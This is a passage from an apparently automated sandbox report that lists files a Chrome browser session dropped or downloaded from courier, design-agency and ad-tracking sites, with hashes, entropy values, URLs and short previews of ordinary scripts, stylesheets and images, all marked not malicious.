cx="1.04166667" cy="5.12295191" r
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (65004)
            Category:dropped
            Size (bytes):72393
            Entropy (8bit):5.412766921199588
            Encrypted:false
            SSDEEP:1536:zyLbgs0Mb17QRA3iovGlNORlHakoOoz0y5gTNNty4jfKRYGCgGBT3E:NlNilbo52TNnXy6u
            MD5:515B44A297516BCCEF87B80A83624909
            SHA1:865C4559C9D3EF804F4E6316BF054971BF0CE3B3
            SHA-256:D10569FAAA5FF0AB369C03D7FB3F63ECBD35B5F4AB5782FA3C230E09BD6F97DA
            SHA-512:EBA80874122547C44AA2BF48F7B4A387F11C1BA5468FEF4FA3CC5A171EA7DE41A9515E2AE4EF1297957C3DB600E94D60FD6365FF3EB838A84C58533910D13DB2
            Malicious:false
            Reputation:low
            Preview:var _hsp = window['_hsp'] = window['_hsp'] || [];._hsp.push(['setBannerSettings', {}]);._hsp.push(['setCustomizationSettings', {}]);._hsp.push(['addCookieDomain', '.hsforms.com']);._hsp.push(['addCookieDomain', '.hubspot.com']);._hsp.push(['addCookieDomain', '.uzer.co']);._hsp.push(['addCookieDomain', '.hubspotpagebuilder.com']);._hsp.push(['addCookieDomain', '.uzerdev.com']);._hsp.push(['setApiBaseUrl', 'https://js.hs-banner.com/v2']);./**. * HubSpot Cookie Banner Code Copyright 2024 HubSpot, Inc. http://www.hubspot.com. */.!function(e){var t={};function n(o){if(t[o])return t[o].exports;var i=t[o]={i:o,l:!1,exports:{}};e[o].call(i.exports,i,i.exports,n);i.l=!0;return i.exports}n.m=e;n.c=t;n.d=function(e,t,o){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:o})};n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"});Object.defineProperty(e,"__esModule",{value:!0})};n.t=function(e,t){1&t&&(e=n(e));if(8&t)return
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:JSON data
            Category:downloaded
            Size (bytes):2
            Entropy (8bit):1.0
            Encrypted:false
            SSDEEP:3:H:H
            MD5:99914B932BD37A50B983C5E7C90AE93B
            SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
            SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
            SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
            Malicious:false
            Reputation:low
            URL:https://px.ads.linkedin.com/attribution_trigger?pid=2644420&time=1727397024088&url=https%3A%2F%2Fwww.servientrega.com%2Fwps%2Fportal%2Frastreo-envio%2F!ut%2Fp%2Fz1%2F04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziTS08TTwMTAz93f1cTAwCg5yMfP0MHT2NPQ30w8EKDHAARwP9KGL041EQhd_4cP0oPFYYOfoaQRXgMaMgNzTCINNREQC2ok6g%2F
            Preview:{}
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1000 x 796, 8-bit/color RGBA, non-interlaced
            Category:dropped
            Size (bytes):450585
            Entropy (8bit):7.992637641827088
            Encrypted:true
            SSDEEP:12288:GRBBXS1YVxDHvFti6+4oAc34VyvfjpQPDn1Y:Cq1Y7DPFtilHIgC7y
            MD5:941FC6F010B2AE336378E25230EF30E0
            SHA1:E247DFA067B7F495791E68C8A3FC705ED075FC13
            SHA-256:4C719CBE55BF3380DEEE3A44BB1C561AC90896426F28DE0E5EC301D7F110C9CF
            SHA-512:DDE463526AAF32B804BBB6C041B9255F417CA2DBB393581E62B968312DDF1F7130B8C5B10450AE1F4EE0CF582EC819DE0BF97CF312F392CD9735594B7E99ED0F
            Malicious:false
            Reputation:low
            Preview:.PNG........IHDR....................pHYs.................sRGB.........gAMA......a....IDATx.....mGu...:..W#...$F!.. .3. ......&.m7.|m..8?;.I..y$.u../_..t'.q...K......0.z...4O..I.....w.j.j...s......O..uj\..V.V..w..f..E..-Z.h1..^.|.w.8.^.|..C....:..x-Z.hA......7..p........{\....3.y.(h.E..-F.m......S1..g..H.z......[)9<t...s..>.g.1...'.....~.<.."....:.P<......;.p.....4^..3R.=Dp}L.wRz.._i....;....v..u...8.Fh.K......j.8...... ./#y...fHyp...:.}E.%.{.......q.=n........P...b.[..-Z.h.b.D.N 2..8.|.x.r.E...B|;&....=B.S.oN...<C..e....2N.=O..}./<ry.....r&...x4..}.w..p...\.$..P..A.N..A..|(T.......g..H%|.^.i.N.NLV...8.mH...G"...D......H..6.{?q..j.ZEa.}G.4/L.......<....}...*.....m.{?o.l7a~q.&...r}.[..o........a...t7v..-Z..Dmx..z$U..s.0._{.@&..e.&..P2N..u....m.H........"..b.....Z.!R..g....#DHx.}..[....W.B.Z..9..f.i!............hkf~...........|.'.%.....S.........l.u..1.....5^..Qw..B$...S........au.|'Z.h...". ....^#..p^..2L#.PE...4.....P/....}z..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1536
            Entropy (8bit):5.219906144393995
            Encrypted:false
            SSDEEP:24:t4LRndFtxY6bgwHFUHc87OOJXLZckYWz6/5uKRxseAwHFUHc87OOJ48byF5lMihY:+RHgFPXLZcfWz6hWP4nFTS
            MD5:E5C5A06E062EF5D90996B78EA47F34E0
            SHA1:68D40AE874118DD4CFD57A78FA15281608211E3F
            SHA-256:80940BC522CF67814164D1BD2A3C642CE1783F4D80958D2E0CBEC812B01AAF3F
            SHA-512:2A07B2628FD195489EF82A43D8E6CC64734B4D614475B95AB47BD9B54A68FD0102567BCACFAE17916C70556C779A6EC6881A9A21E2BE74538F9E856EC21F73B3
            Malicious:false
            Reputation:low
            URL:https://www.servientrega.com/wps/contenthandler/!ut/p/digest!dWYvvbhKekcZQKtCvzyVng/dav/fs-type1/themes/New-Theme-Servientrega/images/svg/ico-tw2.svg
            Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0,0,256,256" width="23px" height="23px"><g fill="none" fill-rule="nonzero" stroke="#262028" stroke-width="32" stroke-linecap="butt" stroke-linejoin="miter" stroke-miterlimit="10" stroke-dasharray="" stroke-dashoffset="0" font-family="none" font-weight="none" font-size="none" text-anchor="none" style="mix-blend-mode: normal"><path d="M120.42141,236.26563c-55.60791,0 -100.68704,-45.07912 -100.68704,-100.68704v-15.15719c0,-55.60791 45.07912,-100.68704 100.68704,-100.68704h15.15719c55.60791,0 100.68704,45.07912 100.68704,100.68704v15.15719c0,55.60791 -45.07912,100.68704 -100.68704,100.68704z" id="shape"></path></g><g fill="none" fill-rule="none" stroke="none" stroke-width="1" stroke-linecap="butt" stroke-linejoin="miter" stroke-miterlimit="10" stroke-dasharray="" stroke-dashoffset="0" font-family="none" font-weight="none" font-size="none" text-anchor="none" style="mix-blend-mode: normal"><g transfor
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (1203)
            Category:downloaded
            Size (bytes):8868
            Entropy (8bit):5.130440294070798
            Encrypted:false
            SSDEEP:192:5H4HcHGr9uIHROschHoqPHyHRuHq/Hp+8HObKuHPHk:6rr+cf
            MD5:D0A7B8CC43AA9D9BC37980573186F668
            SHA1:67262D9435233DD70B6713ABE6DAC956ADFAE617
            SHA-256:F94934A2AB404905A25CAF02219F22337610B659D73A72C82EE8287D698BFD0B
            SHA-512:5FE3D2316D6661BF22D831263E0232F8AACCA2042D53255C3AC15E3C652EEEC60C8E29D6EA53FD587A41092248067E69786D42147151599CEC865E6C0094FECE
            Malicious:false
            Reputation:low
            URL:https://fonts.googleapis.com/css2?family=Noto+Color+Emoji&display=swap
            Preview:/* [0] */.@font-face {. font-family: 'Noto Color Emoji';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/notocoloremoji/v32/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFabsE4tq3luCC7p-aXxcn.0.woff2) format('woff2');. unicode-range: U+1f1e6-1f1ff;.}./* [1] */.@font-face {. font-family: 'Noto Color Emoji';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/notocoloremoji/v32/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFabsE4tq3luCC7p-aXxcn.1.woff2) format('woff2');. unicode-range: U+200d, U+2620, U+26a7, U+fe0f, U+1f308, U+1f38c, U+1f3c1, U+1f3f3-1f3f4, U+1f6a9, U+e0062-e0063, U+e0065, U+e0067, U+e006c, U+e006e, U+e0073-e0074, U+e0077, U+e007f;.}./* [2] */.@font-face {. font-family: 'Noto Color Emoji';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/notocoloremoji/v32/Yq6P-KqIXTD0t4D9z1ESnKM3-HpFabsE4tq3luCC7p-aXxcn.2.woff2) format('woff2');. unicode-range
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):8357
            Entropy (8bit):4.726446810395012
            Encrypted:false
            SSDEEP:192:O+KjZIPCbIozbsTCySpxK3aAX7MYcHgVW1+fm:OnXyi6aIwdUW1+u
            MD5:6F6C51CB2AA4BC332004FF9FAE3C906E
            SHA1:5E7F28CD85D1C87F2E47B9E7B6ABCC1AA34D850A
            SHA-256:32A1C04A6D5B10F5877EE69208ADF04A9210C0C44D97F961F334CF5C2BFE63E3
            SHA-512:615B0E83E539D62370A46529CE23BDF6AE07C2EE561E8652A13EB34F1D06C9700FB4CBA3FF52C9DC8D3C45AA5FF2587CD7E4E0E5EAB457A12ADF96E33FBAF572
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/62.svg
            Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 25.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 218 38" style="enable-background:new 0 0 218 38;" xml:space="preserve">.<style type="text/css">...st0{fill:url(#Path_6_);stroke:#FFFFFF;stroke-width:2.16;}...st1{fill:url(#Path_7_);}...st2{fill:#FFFFFF;}...st3{fill:url(#Path_8_);}...st4{fill:#97999B;}.</style>.<g id="Symbols">..<g id="Footer" transform="translate(-98.000000, -74.000000)">...<g id="Logo-nuevo" transform="translate(100.000000, 76.000000)">....<g id="Group-4">...........<linearGradient id="Path_6_" gradientUnits="userSpaceOnUse" x1="-183.9874" y1="425.0515" x2="-183.956" y2="426.081" gradientTransform="matrix(33.826 0 0 -34 6238.9487 14486.252)">......<stop offset="0" style="stop-color:#009A44"/>......<stop offset="1" style="stop-color:#56C271"/>....
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 192 x 78, 8-bit/color RGBA, non-interlaced
            Category:downloaded
            Size (bytes):6858
            Entropy (8bit):7.9220791226157266
            Encrypted:false
            SSDEEP:192:NeafC9/UAxbNMPq2HDWgl/spt0BqG1uWJ7:NZf0/UAEPqo1l/I0UG1u8
            MD5:D7E572B3644E4BE1DC484D7951411EED
            SHA1:9792B3F4CF4AF3648A8ECCD10A6B8521F3B50F34
            SHA-256:B4EC6B7DEF6C3CC50453643C898F2B0113A9376850C733FD99604D8569C09D7B
            SHA-512:797A3F8B098FA5286FE6C8E29C614EC9265290ED9A75F4DA4347E655DB9742551AB25F3C5EE2CAC9B8156796005367394C0AFEE902D5B3E35EF1AB3A75BCC481
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/69.png
            Preview:.PNG........IHDR.......N.....vf......sBIT....|.d.....IDATx..Ys.X...Z.b..1.ml..'v......5]3.s5.i>.\.}/S..I.I.Mb...,6.1f.H...y.i0`.8[7.U.....H:.9.Y....`Ba?......C..&.C..&.C..&.C..&.C..&.C..&.C..&.C..&.C..&..c...l.....Z...@.4.....8.<..d2.f......t~,..&..C.......#....X,B.ep............o..(C..B.RA...l...E$.A ......b.L8.].J......."X...l..j..j..\.et:.t..B0.8...l..f...,....u..f..$......`..}.l0..7.(..H&..V..4......N......@UUh.F....`..*.Y.X...d. ......@.u8.N...bnn.,k.0..... .2....J...*.f3L&.j..dYF......a..........].(...A .....$I.........../_.D.X....f...1..:5p.........p8 I..f3..<l6....p8...`0.....css...`aa..\.'''.t:.[..\..... .2NOO....[.n.....y'.........v;\..vvv..*...(z......)X.V...!.........`........K...@.$...|>.V......1.m6.fgg...055.....d2}ty.~.\I..........f..R..I../,...t..v..h.....G.v.`,..#...ckk.N...V..R..,....}..vQ.Vqvv...|>.x<.Ie2..0....e.x... .b..P(..j.....(A.Z......q||...2..p..h..D".j..`0...]...!..t:..j...p:.x...g).........b..H$.d2.M.>.\W.a....j....Z..W.^}.-.....
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ISO-8859 text, with CRLF line terminators
            Category:dropped
            Size (bytes):3224
            Entropy (8bit):4.800006129445097
            Encrypted:false
            SSDEEP:48:N2rRnznzYvzWPzE2MJGv2fONFYRVW+R779i79C7AyBN2/3nV30V3YL/3J:2nbw24qv2fO8F2vnR0RYvJ
            MD5:A5B73F41A64B25D9158D8AEF8FB3DBDE
            SHA1:898D7227D4CF4A9310103963B9CBD864CB800AD1
            SHA-256:DD9B1B3637D8632A4B77CE9E9E4B05A9F349236A09A387C9AD76E65D88912944
            SHA-512:546DA1FA17383D1E3DFA260EE6A18E1505D978A0AC0A756DFACD064763AA4610F242BC819FEF651D8421833FCC11D5D28688E8AD4C92DBE857803FC5B7AA570F
            Malicious:false
            Reputation:low
            Preview:$(document).ready(function () {...... $("input[name=filtro][value=g]").attr('checked', 'checked');...var storageVal = localStorage.content;.... if (storageVal != undefined) {.. $("#lblEstado").val(storageVal);.. if (storageVal == 'remiso') {.. $("input[name=filtro][value=r]").attr('checked', 'checked');.. localStorage.removeItem('content');.. } else if (storageVal == 'factura') {.. $("input[name=filtro][value=f]").attr('checked', 'checked');.. localStorage.removeItem('content');.. } else {.. $("input[name=filtro][value=g]").attr('checked', 'checked');.. localStorage.removeItem('content');.. }.. } else {.. $("input[name=filtro][value=g]").attr('checked', 'checked');.. localStorage.removeItem('content');.. }.... $("#boton").click(function () {....localStorage.content = $("#lblEstado").val();.. var valNumguia = $("#txtNumGuia").val();....var estado = $("#lb
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (65325)
            Category:downloaded
            Size (bytes):144877
            Entropy (8bit):5.049937202697915
            Encrypted:false
            SSDEEP:1536:GcoqwrUPyDHU7c7TcDEBi82NcuSELL4d/+oENM6HN26Q:VoPgPard2oENM6HN26Q
            MD5:450FC463B8B1A349DF717056FBB3E078
            SHA1:895125A4522A3B10EE7ADA06EE6503587CBF95C5
            SHA-256:2C0F3DCFE93D7E380C290FE4AB838ED8CADFF1596D62697F5444BE460D1F876D
            SHA-512:93BF1ED5F6D8B34F53413A86EFD4A925D578C97ABC757EA871F3F46F340745E4126C48219D2E8040713605B64A9ECF7AD986AA8102F5EA5ECF9228801D962F5D
            Malicious:false
            Reputation:low
            URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
            Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors. * Copyright 2011-2018 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */:root{--blue:#007bff;--indigo:#6610f2;--purple:#6f42c1;--pink:#e83e8c;--red:#dc3545;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#ffc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--font-family-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace}*,::after,::before{box-sizing:border-box}html{font-family:sans
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):1080
            Entropy (8bit):4.781460297851692
            Encrypted:false
            SSDEEP:24:2dZnmPLD/veaxMn+xV0Ll4My2R+tyH9R/rcHKH9R/pH9Rr:cZmjkMITiSFr
            MD5:F86D350868B114B43D8E978026E2DD78
            SHA1:3643CDA9FE6C5DFAEB0C16035B5A41A8C677450A
            SHA-256:84DF6C27C12E4D7283CF3632AE8E5746606B6F1CF6032F733646BE2DD2906658
            SHA-512:8C9CE80B88B1CAF2385ABA96A74EDF7206159D043E992FC8EB68A8BD088EA344F3E3478D658BB9BADC96274F3D8B60195D137D0B35E4CC2339EE9D204E6DECEB
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/ico-procesos-03.svg
            Preview:<?xml version="1.0" encoding="UTF-8"?>..<svg width="55px" height="55px" viewBox="0 0 55 55" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <title>Group 58</title>.. <g id="HOME" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">.. <g transform="translate(-1029.000000, -699.000000)" id="Group-58">.. <g transform="translate(1029.000000, 699.000000)">.. <g id="Group-55" fill="#3B4DE9">.. <rect id="Rectangle" x="0" y="0" width="55" height="55" rx="18"></rect>.. </g>.. <g id="Group-14" transform="translate(15.000000, 18.000000)" fill="#FFFFFF">.. <rect id="Rectangle" x="11.34" y="0" width="12.96" height="3.24" rx="1.62"></rect>.. <rect id="Rectangle" x="4.86" y="7.29" width="12.96" height="3.24" rx="1.62"></rect>.. <rect id="Rectangle" x="0" y="15.39" width="12.96" height="3.24" rx="1.62"
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:PNG image data, 1800 x 1431, 8-bit colormap, non-interlaced
            Category:downloaded
            Size (bytes):406566
            Entropy (8bit):7.975683961155173
            Encrypted:false
            SSDEEP:6144:RL+hcDMt4CJXzhh7Mdx0orzE1EtiYfC5BfZFK7pi+tXbpOIg8OCOJ:RL+hcD44CthiHZeki26de7pi+trngXLJ
            MD5:A58416B2DB34E27B77AB35DB1A5A9C65
            SHA1:1ABBF0F42E20C8406C6B1D3E36691D83EB047D0C
            SHA-256:5C8DFDCDF65578E7C5A6C5EDC4BA285D7819D36CD6542D9617A16561D41D2A34
            SHA-512:C464CB444485EC778BC00B99130EA5BCE04CB9D4B93F349E0EE92B1D186044DCAA8F264C26B1CB52A3789BA82FBE780344FC7CF577AF0C42D21C9D0CDDC88DE3
            Malicious:false
            Reputation:low
            URL:https://uzer.co/images/port1.png
            Preview:.PNG........IHDR.............d.......PLTE........A.....C..6..>.....3..;..9"$'...../.."........%..!..,........(... "$............$'(.."..<..$...(+-..(.. A8I.!0..(....&:&)+.#5..7.(?..3..,..8..)...."D:M..-.. ..(*-1..-..'.. .+E.03.....64,;.."..#.....#..,..,..7.....2..%..0-/0........3..;................................1..(.. .....2..... ...246QTY!!..........KMR..&(,% &..%..'EGJ.........IKNNQU..%......$(.......;3D..H..-UX^,..678'..ijj..K...!.......*'#/...2..,2'9;>131ACF.....8>?B...pnu...).........&..............{z~7..49+...]^_...vvw0W...z..GX.def?v.28.:w.<B/...%t.At.^]j..4Z..KX....;v...m|-Wc-...NX-m..EM*.....Fy.*1%.6w.&4...,bp+a..)W.GI8=F...Xz.C8F]..<E0..7dRb...6_t...t..;..^..L..SJXl...)3FhsAX...XZ......y..$>}3e...]X........^...o....p.....[kB...R........V._H...m"...}b.|.P...n6wl...5......F..N..0.IDATx..n.6.E.a....~....-./..s.'......H.%.4..3..v..........?.y1.......<..T.~.>..3.Li....+.....X.Tv9........d..xh....O....1.Y...5E..6..s.....]..iW.....n.O..Z..*......".v..
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:dropped
            Size (bytes):1700
            Entropy (8bit):4.469771756896555
            Encrypted:false
            SSDEEP:48:cTg8HBFc/39YzcpGXGikwU+TK8gssy5eeO3/iAiDpm/xE7b4udM:/8HBF8pGfkwU+eo5eejlEB
            MD5:D66D5AAA1970D9289EDF2B9341DE9995
            SHA1:6587878621F7748956604AF987240FC69550ECB9
            SHA-256:EFF55D137084E07D65BA61FE2F1E0AA6B9C2F960161DC8A68CE66284ACE6C9CE
            SHA-512:B89A8BF61C810CE7F786810DE2FA2B423E54720F61C18101C05676B06C4425A69EB5D3BEE58BB5A745EFCD176E15096C11C664EE30D89BB0E9D5498FA4CB2058
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="utf-8"?>..<svg width="33px" height="29px" viewBox="0 0 33 29" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg">.. <g id="headphones-(1)" transform="translate(0.15000153 0.14990234)">.. <path d="M28.1326 11.387C27.9954 8.40438 26.7645 5.61975 24.6068 3.50244C22.3188 1.24401 19.262 0 16 0C9.48411 0 4.16452 5.06077 3.86849 11.3869C1.67285 11.7783 0 13.66 0 15.9266L0 19.2568C0 21.8061 2.1125 23.88 4.70937 23.88L4.8474 23.88L4.8474 25.0938C4.8474 26.8261 6.28282 28.2353 8.0474 28.2353L15.4193 28.2353C16.0083 28.2353 16.4859 27.7664 16.4859 27.1881C16.4859 26.6099 16.0083 26.141 15.4193 26.141L8.0474 26.141C7.45938 26.141 6.98073 25.6711 6.98073 25.0938L6.98073 23.88L8.60938 23.88C9.19844 23.88 9.67605 23.4111 9.67605 22.8328L9.67605 12.3506C9.67605 11.7723 9.19845 11.3034 8.60938 11.3034L6.00619 11.3034C6.34173 6.17164 10.6893 2.0943 16 2.0943C18.6901 2.0943 21.2094 3.11896 23.0963 4.98112C24.8329 6.68537 25.8414 8
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:HTML document, ASCII text, with no line terminators
            Category:downloaded
            Size (bytes):13
            Entropy (8bit):2.7773627950641693
            Encrypted:false
            SSDEEP:3:qVZPV:qzd
            MD5:C83301425B2AD1D496473A5FF3D9ECCA
            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
            Malicious:false
            Reputation:low
            URL:https://td.doubleclick.net/td/rul/10981864615?random=1727397050580&cv=11&fst=1727397050580&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45je49p0v867598331za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fuzer.co%2F&hn=www.googleadservices.com&frm=0&tiba=UZER%20-%20Agencia%20de%20Consultor%C3%ADa%20y%20Dise%C3%B1o%20UX%20%2F%20UI&npa=0&pscdl=noapi&auid=1494440894.1727397051&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
            Preview:<html></html>
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (32191), with CRLF line terminators
            Category:dropped
            Size (bytes):34342
            Entropy (8bit):5.42994637335851
            Encrypted:false
            SSDEEP:768:TpxyiYGAdS/L8kgF55HF+YZkyfu9P/eZw2hhmKHeu:nyFS/Akgn5F+okyfu9emimsX
            MD5:630003C0BB2F3DE3769B438125F4A572
            SHA1:E455F4B344AF907A34D70C758D8E07B5DDE61761
            SHA-256:FEE4E9FD05EC2A9AFDC6C789E3C80027F3C81CF916AAC740D2C2B9419ADF9661
            SHA-512:FB20201CDF9A438F2A6A66E78E6C96BC169885E768FC69DD61251BA457C8432232DC4F25B429C2FC7B2CB759C258DEECD46FC73597502EE5DC140A5B65402632
            Malicious:false
            Reputation:low
            Preview:/*! VelocityJS.org (1.1.0). (C) 2014 Julian Shapiro. MIT @license: en.wikipedia.org/wiki/MIT_License */../*! VelocityJS.org jQuery Shim (1.0.1). (C) 2014 The jQuery Foundation. MIT @license: en.wikipedia.org/wiki/MIT_License. */..!function(e){function t(e){var t=e.length,r=$.type(e);return"function"===r||$.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===r||0===t||"number"==typeof t&&t>0&&t-1 in e}if(!e.jQuery){var $=function(e,t){return new $.fn.init(e,t)};$.isWindow=function(e){return null!=e&&e==e.window},$.type=function(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?a[o.call(e)]||"object":typeof e},$.isArray=Array.isArray||function(e){return"array"===$.type(e)},$.isPlainObject=function(e){var t;if(!e||"object"!==$.type(e)||e.nodeType||$.isWindow(e))return!1;try{if(e.constructor&&!n.call(e,"constructor")&&!n.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(r){return!1}for(t in e);return void 0===t||n.call(e,t)},$.each=function(e,r,a){var n,o=0,i=e.length,s=
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:ASCII text, with very long lines (5112), with no line terminators
            Category:downloaded
            Size (bytes):5112
            Entropy (8bit):5.911059182717365
            Encrypted:false
            SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRU2E27agX6Rr:1DY0hf1bT47OIqWb1q27ac8r
            MD5:BB7CE85C874567C1592ACCF8AD4D4C97
            SHA1:B01237DC191A29EBD03242E147776A05770E8781
            SHA-256:F9775CA984FD2F84C12C72FB1846A5A45E38FBAC2F864B16DBAC84062DB10603
            SHA-512:67E573A97ADEB79E551F9C8B3954F5C3C05FA25F2A0784FA4AE39486B6C436CAE760415B51F17104461EB3655816CB864F1028790D0CD5ED464B73C7D4192C59
            Malicious:false
            Reputation:low
            URL:https://www.googleadservices.com/pagead/conversion/10981864615/?random=1727397050638&cv=11&fst=1727397050638&bg=ffffff&guid=ON&async=1&gtm=45je49p0v867598331za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fuzer.co%2F&label=V20XCPG92OMDEKfpx_Qo&hn=www.googleadservices.com&frm=0&tiba=UZER%20-%20Agencia%20de%20Consultor%C3%ADa%20y%20Dise%C3%B1o%20UX%20%2F%20UI&gtm_ee=1&npa=0&pscdl=noapi&auid=1494440894.1727397051&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=event%3Dconversion&rfmt=3&fmt=4
            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
            File Type:SVG Scalable Vector Graphics image
            Category:downloaded
            Size (bytes):794
            Entropy (8bit):5.11917794828243
            Encrypted:false
            SSDEEP:24:2dUnn3XxJRTH9WDhUs06wAGejnQ5+5TgzOj/WR02:cUnntH94XwAuQSg/Wf
            MD5:95B334F2497AE6927DBA9AAAAF001989
            SHA1:DEBB12709A29EBE01E9645C582E05CFA6CD1D871
            SHA-256:3C6937313996B6046D6FC011474762476571232049620732CE9AA9FB72D151AA
            SHA-512:F011E00B49A386227E9E93324391FE8D41A0632E36B56691DB3B837EC76CAB92B78E8E6A73522C73FD10EE8C3F11FF758A5ADF1AE8BC763A66FD0C81E7CE0120
            Malicious:false
            Reputation:low
            URL:https://qdjtq.com/modify/layout/images/49.svg
